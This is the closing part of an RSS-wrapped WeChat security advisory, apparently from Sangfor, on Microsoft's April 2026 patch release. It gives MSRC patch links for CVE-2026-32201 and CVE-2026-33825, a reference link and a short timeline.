style="text-align:center;"><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋;mso-ansi-font-weight:normal;font-size:10.5000pt;"><span leaf="">Microsoft Defender Antimalware Platform</span></span></p></td></tr></tbody></table></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041684" src="https://wechat2rss.xlab.app/img-proxy/?k=3647b5e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxS2Yu2gS8gA8hdORAugPhOVvqMUXwU11G7IxBl4CBVe8KPlb0KMph57mALEm6Ojriaiad7v6OyVdUfNFJK1JmyUVGZjTLeEX80ww%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201" target="_blank">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825" target="_blank">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">参考链接</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Apr" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2026-Apr</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/4/15</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">微软例行补丁日，微软官网发布漏洞安全公告。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/4/15</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深信服千里目安全技术中心发布安全通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4787037037037037" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041690" src="https://wechat2rss.xlab.app/img-proxy/?k=f36edca7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxQuqMsDdiaiblL2XgSF3CAWrAvP14evzWe8YeZIcqo0Mxsu4kicp8T6uhUwFdCFtIrgj3yPpQF56m8xBvnGpr3eS8PGes8lWk8Ubk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16255%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2dca9255&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525339%26idx%3D2%26sn%3Df5d9f09c0128dbbf80d8f2a51f0ea2a5">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 15 Apr 2026 19:40:00 +0800</pubDate>
    </item>
  </channel>
</rss>